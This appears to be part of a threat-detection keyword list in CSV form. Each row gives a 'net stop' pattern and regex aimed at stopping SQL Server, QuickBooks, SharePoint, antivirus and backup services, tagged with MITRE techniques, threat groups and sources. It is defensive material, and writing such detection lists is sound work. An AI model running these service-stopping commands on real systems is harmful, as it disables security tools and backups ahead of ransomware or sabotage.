"*net stop MSSQLServerADHelper100*",".{0,1000}net\sstop\sMSSQLServerADHelper100.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QBCFMonitorService*",".{0,1000}net\sstop\sQBCFMonitorService.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QBPOSDBServiceV12*",".{0,1000}net\sstop\sQBPOSDBServiceV12.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QBVSS*",".{0,1000}net\sstop\sQBVSS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QuickBooksDB1*",".{0,1000}net\sstop\sQuickBooksDB1.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QuickBooksDB2*",".{0,1000}net\sstop\sQuickBooksDB2.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QuickBooksDB3*",".{0,1000}net\sstop\sQuickBooksDB3.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QuickBooksDB4*",".{0,1000}net\sstop\sQuickBooksDB4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop QuickBooksDB5*",".{0,1000}net\sstop\sQuickBooksDB5.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ReportServer$ISARS*",".{0,1000}net\sstop\sReportServer\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop sacsvr*",".{0,1000}net\sstop\ssacsvr.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SAVAdminService*",".{0,1000}net\sstop\sSAVAdminService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SAVService*",".{0,1000}net\sstop\sSAVService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop shadowprotectsvc*",".{0,1000}net\sstop\sshadowprotectsvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ShadowProtectSvc*",".{0,1000}net\sstop\sShadowProtectSvc.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop sharedaccess*",".{0,1000}net\sstop\ssharedaccess.{0,1000}","greyware_tool_keyword","net","stopping shared access","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*net stop ShMonitor*",".{0,1000}net\sstop\sShMonitor.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop Smcinst*",".{0,1000}net\sstop\sSmcinst.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SmcService*",".{0,1000}net\sstop\sSmcService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop sms_site_sql_backup*",".{0,1000}net\sstop\ssms_site_sql_backup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SntpService*    ",".{0,1000}net\sstop\sSntpService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop sophossps*",".{0,1000}net\sstop\ssophossps.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SPAdminV4*",".{0,1000}net\sstop\sSPAdminV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SPSearch4*",".{0,1000}net\sstop\sSPSearch4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SPTimerV4*",".{0,1000}net\sstop\sSPTimerV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SPTraceV4*",".{0,1000}net\sstop\sSPTraceV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SPUserCodeV4*",".{0,1000}net\sstop\sSPUserCodeV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SPWriterV4*",".{0,1000}net\sstop\sSPWriterV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop spxservice*",".{0,1000}net\sstop\sspxservice.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop sqbcoreservice*",".{0,1000}net\sstop\ssqbcoreservice.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SQLAgent$ISARS*",".{0,1000}net\sstop\sSQLAgent\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SQLAgent$MSFW*",".{0,1000}net\sstop\sSQLAgent\$MSFW.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SQLAgent$SOPH",".{0,1000}net\sstop\sSQLAgent\$SOPH","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SQLAgent$VEEAMSQL*",".{0,1000}net\sstop\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SQLAgent$VEEAMSQL*",".{0,1000}net\sstop\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop SQLBrowser*",".{0,1000}net\sstop\sSQLBrowser.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop SQLWriter*",".{0,1000}net\sstop\sSQLWriter.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop stc_endpt_svc*",".{0,1000}net\sstop\sstc_endpt_svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop stop SepMasterService*",".{0,1000}net\sstop\sstop\sSepMasterService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
